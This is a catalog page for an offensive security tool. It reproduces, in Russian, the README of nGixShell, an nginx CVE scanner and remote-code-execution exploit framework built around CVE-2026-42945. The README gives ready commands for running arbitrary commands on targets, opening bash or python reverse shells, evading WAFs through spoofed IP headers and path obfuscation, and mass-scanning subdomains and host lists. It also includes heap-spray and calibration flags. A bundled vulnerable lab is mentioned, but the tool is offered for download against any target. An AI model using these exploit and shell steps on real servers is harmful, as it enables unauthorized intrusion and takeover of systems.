Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
nGixshell — nginx CVE-сканер + фреймворк RCE-эксплойтов (CVE-2026-42945 + ещё 16) | Kitploit
Инструменты/GitHubGitHub/mateusverass/ngixshell
РазведкаСканеры уязвимостейФреймворки для эксплойтовЭксплуатация веб-приложенийОбход WAFВеб-безопасностьТестирование на ПроникновениеКомандование и УправлениеПеречисление ПоддоменовRed TeamingРазработка Полезной Нагрузки
218323 дней назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHubmateusverass/ngixshell

nGixshell

nginx CVE-сканер + фреймворк RCE-эксплойтов (CVE-2026-42945 + ещё 16)

Репозиторий
Поделиться
nGixShell

Python CVEs Zero deps License


nGixShell — это сканер CVE nginx и фреймворк для эксплуатации RCE. Он включает proof-of-concept для CVE-2026-42945 (CVSS 3.1 8.1 HIGH по данным F5/NVD) — переполнение буфера в куче в ngx_http_rewrite_module — и сканер, охватывающий 64 CVE nginx с автоматическими HTTP-пробами, фингерпринтингом, обнаружением/обходом WAF, аудитом веб-безопасности и генерацией отчётов.

Без внешних зависимостей. Только стандартная библиотека Python 3.

Предварительные требования для эксплуатации (прочитайте первым делом). --cmd / --shell работают только когда все эти условия выполнены: цель — x86_64, уязвимая конфигурация rewrite+set присутствует, ASLR отключён, а адреса кучи/libc были откалиброваны для этой конкретной сборки (calibrate.py → --build-file). См. Требования для эксплуатации. У самого сканера таких требований нет.


Быстрый старт

# Spin up the vulnerable lab (builds nginx from source, ASLR disabled)
docker compose -f env/docker-compose.yml up -d --build

# Auto mode — fingerprint + CVE scan + web audit (works on any arch)
python3 ngixshell.py 127.0.0.1:19321

# RCE — calibrate, restart the worker for a clean heap, then exploit
W=$(pgrep -f 'nginx: worker' | head -1)
sudo python3 calibrate.py 127.0.0.1 19321 "$W" --spray-path /spray \
    --spray-mode full --json -o profile.json
docker compose -f env/docker-compose.yml restart nginx-vuln
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id > /tmp/rce.txt' \
    --build-file profile.json
docker compose -f env/docker-compose.yml exec nginx-vuln cat /tmp/rce.txt

# Drop a reverse shell (IP auto-detected)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell --build-file profile.json

# Detect and bypass WAF, then scan
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Subdomain scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Multiple targets from a file (one report per target)
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

Флаги не требуются — при указании цели инструмент запускает всё автоматически.
TLS определяется автоматически. nginx фингерпринтится даже при server_tokens off.

system() не захватывает stdout: --cmd 'id' выполняется, но ничего не выводит обратно. Используйте команду с наблюдаемым побочным эффектом и подтвердите её с помощью --verify-url http://target/pwned (HTTP 200 = подтверждено).


Использование

python3 ngixshell.py [TARGET] [OPTIONS]

TARGET formats:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

Режимы

ФлагОписание
(нет)Авто — фингерпринтинг + сканирование CVE + веб-аудит
--cmd 'CMD'Выполнить команду через RCE CVE-2026-42945
--cmd-file FILEВыполнить команды из файла (объединяются через ;)
--shellПолучить reverse shell
--shell-type TYPEПолезная нагрузка: bash python perl php nc powershell (по умолчанию: python)
--upgrade-shellАвтоматически отправить PTY-апгрейд после подключения shell
--verify-url URLПосле обнаруженного краха запросить URL для подтверждения выполнения команды (200 = подтверждено)
--subdomain-scan DOMAINНайти уязвимый nginx на поддоменах
--cve CVE-IDПроверить одну конкретную CVE
--list-cvesВывести все 64 CVE с CVSS и информацией о пробах
--list-candidatesВывести кандидаты адресов кучи
--dry-runТолько фингерпринтинг + сканирование, без эксплуатации
--target-file FILEСканировать несколько хостов из файла

Настройка эксплуатации

ФлагОписание
--build-file FILEРекомендуется. JSON-профиль калибровки из calibrate.py --json -o FILE
--offsets SPECРазделённые запятыми hex-смещения кучи из calibrate.py (например, 0x5a427,0x60e67)
--heap-base HEX / --libc-base HEX / --system-addr HEXРучное переопределение адресов
--build KEYВстроенный профиль (только эталонная лаборатория DepthFirst поставляется)
--rewrite-path PATHУязвимая локация rewrite (по умолчанию /api)
--spray-path PATHЛокация с proxy_pass, используемая для спрея в теле POST (по умолчанию /upload; в комплектной лаборатории используется /spray)
--spray-mode partial|fullpartial: короткое тело + большой Content-Length (комплектная лаборатория); full: полное тело + X-Delay (лаборатория DepthFirst)
--pad-a N / --pad-plus NПаддинг пути триггера перед последовательностью + (по умолчанию 349 / 969, из вендорского PoC)
--continue-on-crashПродолжать перебор оставшихся кандидатов кучи после неподтверждённого краха
--tries N / --spray N / --body-len NПопытки триггера на кандидата / соединения спрея / размер тела спрея

Обнаружение и обход WAF

ФлагОписание
--waf-detectОбнаружить WAF перед сканированием
--waf-bypassВключить все техники обхода (также запускает обнаружение)
--waf-ip IPПодменить этот IP в заголовках обхода (по умолчанию: случайный RFC1918)

Техники обхода (все активны при --waf-bypass):

ТехникаДетали
Подмена IPX-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
Ротация UA11 реальных User-Agent браузеров/ботов, рандомизируются на каждый запрос
Обфускация путидвойной слэш, паддинг /./, процентное кодирование, вариация регистра
Перемешивание регистра заголовковрандомизирует регистр имён заголовков для нарушения сопоставления шаблонов WAF

Обнаруживаемые WAF: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence

Веб-аудит

Запускается автоматически в режиме сканирования. Все модули можно пропустить по отдельности.

ФлагОписание
--skip-headersПропустить аудит заголовков безопасности HTTP
--skip-pathsПропустить обнаружение путей/файлов
--skip-vhostsПропустить перечисление виртуальных хостов
--skip-tlsПропустить аудит протоколов TLS
--path-wordlist FILEДополнительные пути для проверки (по одному в строке)
  • Аудит заголовков — HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy, заголовки, раскрывающие версию
  • Обнаружение путей — 50+ путей; сигнальная проба устраняет ложные срабатывания от catch-all правил 403/301
  • Перечисление виртуальных хостов — требует различия и статуса, и тела, чтобы избежать ложных срабатываний от default-block
  • Аудит TLS — проверяет поддержку TLS 1.0–1.3, срок действия сертификата и обнаружение самоподписанных сертификатов
  • stub_status — парсит метрики активных соединений из /nginx_status, если он открыт

Соединение

ФлагОписание
--port PORTПереопределить порт
--tlsПринудительно использовать TLS (по умолчанию определяется автоматически)
--proxy URLПрокси: http://, https://, socks5://

HTTP

ФлагОписание
--user-agent UAПользовательский User-Agent
--auth USER:PASSHTTP Basic auth
--cookie VALUEЗаголовок Cookie
--header NAME:VALUEДополнительный заголовок (можно повторять)

Скорость / Тайминги

Скачать инструмент